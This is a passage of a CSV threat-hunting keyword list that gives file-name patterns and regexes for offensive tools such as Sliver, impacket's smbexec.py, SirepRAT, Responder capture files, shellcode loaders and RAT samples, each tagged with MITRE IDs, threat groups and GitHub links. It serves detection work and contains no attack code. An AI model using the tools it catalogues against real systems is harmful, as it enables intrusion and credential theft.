TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18833" "*\SimpleLoader.cpp*",".{0,1000}\\SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","18841" "*\SimpleLoader.exe*",".{0,1000}\\SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","18842" "*\simpleXORencoder.c*",".{0,1000}\\simpleXORencoder\.c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18844" "*\SimShell 1.0 - Simorgh Security MGZ.php*",".{0,1000}\\SimShell\s1\.0\s\-\sSimorgh\sSecurity\sMGZ\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18845" "*\SingleDose.csproj*",".{0,1000}\\SingleDose\.csproj.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18846" "*\SingleDose.exe*",".{0,1000}\\SingleDose\.exe.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18847" "*\SingleDose.sln*",".{0,1000}\\SingleDose\.sln.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18848" "*\SingleDose-main.zip*",".{0,1000}\\SingleDose\-main\.zip.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","18849" "*\S-inject.exe*",".{0,1000}\\S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18850" "*\S-inject.vcxproj*",".{0,1000}\\S\-inject\.vcxproj.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18851" 
"*\S-inject_x64.exe*",".{0,1000}\\S\-inject_x64\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18852" "*\S-inject_x86.exe*",".{0,1000}\\S\-inject_x86\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","18853" "*\Sirep_Command_Payload.bt*",".{0,1000}\\Sirep_Command_Payload\.bt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18854" "*\SirepRAT.py*",".{0,1000}\\SirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18855" "*\SirepRAT\*",".{0,1000}\\SirepRAT\\.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18856" "*\SirepRAT-2.0.0\*",".{0,1000}\\SirepRAT\-2\.0\.0\\.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows 
IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18857" "*\SirepRAT-master*",".{0,1000}\\SirepRAT\-master.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","18858" "*\sitadel.log*",".{0,1000}\\sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","18861" "*\sl0p.dll*",".{0,1000}\\sl0p\.dll.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","18862" "*\SlayerRAT v*.exe*",".{0,1000}\\SlayerRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18864" "*\slinky.py*",".{0,1000}\\slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18865" "*\slip.py *",".{0,1000}\\slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","18866" "*\slip-main.zip",".{0,1000}\\slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","18867" "*\sliver.exe*",".{0,1000}\\sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18868" "*\sliver-client.exe*",".{0,1000}\\sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18869" "*\sliver-client_windows.exe*",".{0,1000}\\sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18870" "*\sliver-client_windows-386*.exe*",".{0,1000}\\sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18871" "*\sliver-client_windows-amd64*.exe*",".{0,1000}\\sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18872" "*\sliver-client_windows-arm64*.exe*",".{0,1000}\\sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18873" "*\sliverpb.Exe*",".{0,1000}\\sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","18874" "*\SlowPathMITM.py*",".{0,1000}\\SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can 
also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","18875" "*\Small-Net RAT v*.exe*",".{0,1000}\\Small\-Net\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18876" "*\SmallSecretsDump.py*",".{0,1000}\\SmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","18877" "*\Smart RAT v*.exe*",".{0,1000}\\Smart\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18878" "*\smartbrute\*",".{0,1000}\\smartbrute\\.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","18879" "*\smartbrute-main*",".{0,1000}\\smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","18880" "*\smb_control.bat*",".{0,1000}\\smb_control\.bat.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","18881" "*\SMB_RPC\*.py",".{0,1000}\\SMB_RPC\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18882" "*\smb_SCNotification.exe*",".{0,1000}\\smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","18883" "*\SMB_Staging.c*",".{0,1000}\\SMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18884" "*\SMB-Clear-Text-Password-*.txt*",".{0,1000}\\SMB\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18885" "*\smbclient.exe*",".{0,1000}\\smbclient\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","risk of false positives","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18886" "*\smbclient.py*",".{0,1000}\\smbclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18887" "*\smbexec.py*",".{0,1000}\\smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18888" "*\SMBGrab.pl*",".{0,1000}\\SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18889" "*\SMBHunt.pl*",".{0,1000}\\SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18890" "*\SMBList.pl*",".{0,1000}\\SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a 
network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","18891" "*\smblogin.ps1*",".{0,1000}\\smblogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Lateral Movement","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18892" "*\smblogin.results.txt*",".{0,1000}\\smblogin\.results\.txt.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Lateral Movement","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18893" "*\smblogin-extra-mini.ps1*",".{0,1000}\\smblogin\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","18894" "*\smbmap.py*",".{0,1000}\\smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - 
T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","18895" "*\SMB-NTLMSSPv2-Client-*.txt*",".{0,1000}\\SMB\-NTLMSSPv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18896" "*\SMB-NTLMv1-Client-*.txt*",".{0,1000}\\SMB\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18897" "*\smbpasswd.py*",".{0,1000}\\smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
